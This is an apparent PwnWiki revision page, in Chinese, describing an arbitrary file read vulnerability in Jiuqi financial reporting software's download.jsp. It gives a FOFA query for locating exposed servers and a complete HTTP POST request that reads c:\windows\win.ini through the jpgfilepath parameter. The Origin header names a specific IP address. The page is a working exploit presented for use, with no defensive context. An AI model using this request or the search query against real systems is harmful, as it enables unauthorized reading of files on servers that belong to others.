Difference between revisions of "久其財務報表 download.jsp 任意文件讀取漏洞"
From PwnWiki
(Created page with "<languages /> ==FOFA== <pre> body="/netrep/" </pre> <translate> ==漏洞利用== </translate> <translate> 發送以下請求: </translate> <pre> POST /netrep/ebook/browse/...") |
(Marked this version for translation) |
||
| Line 7: | Line 7: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
發送以下請求: | 發送以下請求: | ||
</translate> | </translate> | ||
Latest revision as of 14:40, 9 June 2021
FOFA
body="/netrep/"
漏洞利用
發送以下請求:
POST /netrep/ebook/browse/download.jsp HTTP/1.1 Host: Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://114.251.113.53:7002 Content-Type: application/x-www-form-urlencoded jpgfilepath=c:\windows\win.ini